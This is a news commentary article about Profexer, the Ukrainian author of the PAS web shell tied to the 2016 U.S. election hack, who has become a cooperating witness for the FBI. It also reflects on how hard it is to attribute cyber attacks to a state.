Ukrainian hacker could help lift fog on Russia’s role in U.S. election

Mystery of cyber attack deepens as malware writer becomes witness for FBI

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someonePrint this page

In all the noise of this week’s events, it would be easy to miss some dra­mat­ic news out of Kiev today. So I’ll ampli­fy it here. A Ukrain­ian hack­er who wrote code that might have helped hack the U.S. election—and oth­er polit­i­cal events around the world—has turned FBI wit­ness, The New York Times says.

Bob Sul­li­van, jour­nal­ist and one of the found­ing mem­bers of

His pseu­do­nym is Pro­fex­er, and plen­ty of peo­ple are won­der­ing about his safe­ty right now.

Below is a brief syn­op­sis, but you should real­ly read the entire report.

As with all things cyber, and all things polit­i­cal, it’s not as clear as one would wish. Pro­fex­er is a well-regard­ed Ukrain­ian hack­er who wrote a hack­er tool some­times called PAS. It’s one of sev­er­al tools a hack­er might use when tak­ing over a net­work. Essen­tial­ly, it’s a base of oper­a­tions installed after a suc­cess­ful break-in. It allows a remote hack­er to eas­i­ly open a “shell”—a prompt for exe­cut­ing commands—on a com­pro­mised network.

Relat­ed arti­cle: A pre­dic­tion of elec­tion chaos pri­or to 2016 pres­i­den­tial vote

In the days after the elec­tion, but before the inau­gu­ra­tion, the Oba­ma admin­is­tra­tion accused Rus­sia of hack­ing the elec­tion and offered a few crumbs of dig­i­tal foren­sic evi­dence. Chief among them: use of the PAS shell pro­gram. Pro­fex­er made the tool.

Hack­er comes forward

Pro­fex­er didn’t do the hack­ing, but the release scared him. Soon after, the Times now reports, Pro­fex­er got very cold feet, and turned him­self in to Ukrain­ian author­i­ties for a chat. Because mak­ing soft­ware gen­er­al­ly isn’t a crime, he was not charged with any­thing. The Times quotes Ukrain­ian offi­cials as say­ing he is, instead, a coop­er­at­ing witness—a very rare human being from the under­ground appear­ing in flesh and blood, appar­ent­ly offer­ing to help the FBI chase down oth­er hack­ers. Per­haps, help­ing chase down Rus­sians who did the hacking.

Sev­er­al things mud­dy the waters here. An analy­sis, pub­lished by Word­fence, does indeed show that Profexer’s code is impli­cat­ed by the U.S. analy­sis. But, odd­ly enough, it was an old, out­dat­ed ver­sion of Profexer’s soft­ware. It would have been avail­able from any num­ber of places, and was fair­ly wide­ly used. So by itself, use of PAS means almost noth­ing. U.S. elec­tion hack­ers could have down­loaded it from anywhere.

Cod­ing for cash

Still, the Times points out that Pro­fex­er did work for hire, too—he wrote spe­cial ver­sions of his tool for mon­ey. And in anoth­er polit­i­cal hack­ing inci­dent involv­ing Ukraine, author­i­ties found dig­i­tal fin­ger­prints of Profexer’s code. Clear­ly, he must know inter­est­ing peo­ple. Per­haps Russians.

Once again, we are back to the prob­lem of attri­bu­tion in cyber attacks. Nation-states often don’t cyber attack each oth­er direct­ly. There’s no need. There are so many oth­er ways to do it. Cyber armies are out­sourced to give plau­si­ble deni­a­bil­i­ty. Were the Rus­sians look­ing to hack a U.S. elec­tion, they wouldn’t need to assign the task to a cyber army. They could hire free­lance hack­ers to do it. Bet­ter yet, lone actors might do some of the work on their own, out of patri­o­tism, with a wink and a nod from author­i­ties. And you can imag­ine a murky con­tin­u­um between those two things.

Also quite pos­si­ble: A free­lance hack­er could be hired with­out any idea who was pay­ing him or her. Pro­fex­er could have been com­mis­sioned to write code for the Russians—or for that mat­ter, any country—and have no idea who was sign­ing the check.

Many ques­tion marks remain

It is a very big deal that this hack­er is talk­ing to author­i­ties. One imag­ines his Rolodex is fas­ci­nat­ing. But as with all spook sto­ries, it’s impor­tant to remem­ber what is known and what is a guess. As Word­fence put it, we know the U.S. gov­ern­ment says old code was used to hack the elec­tion, and we know gov­ern­ment offi­cials say the per­son who wrote that code is now coop­er­at­ing with author­i­ties. That’s about it.

It’s also impor­tant to note that, with rare excep­tions, we rarely ever learn such things unless some­one wants us to know for a rea­son. Why are author­i­ties con­firm­ing Profexor’s coop­er­a­tion now? Per­haps they are turn­ing up the heat on those who paid him. Per­haps they are close to a break in the case. Or per­haps they are throw­ing a Hail Mary pass.

Let’s hope Pro­fex­or has plen­ty of time to tell his stories.

More sto­ries relat­ed to elec­tion tampering:
Try­ing to prove Krem­lin role in U.S. elec­tion hack­ing will be dif­fi­cult, frustrating
To main­tain democ­ra­cy, dig­i­tal elec­tion net­works must be improved
Did Macron hack the hack­ers, foil­ing Russ­ian influ­ence on French election?


Posted in Featured Story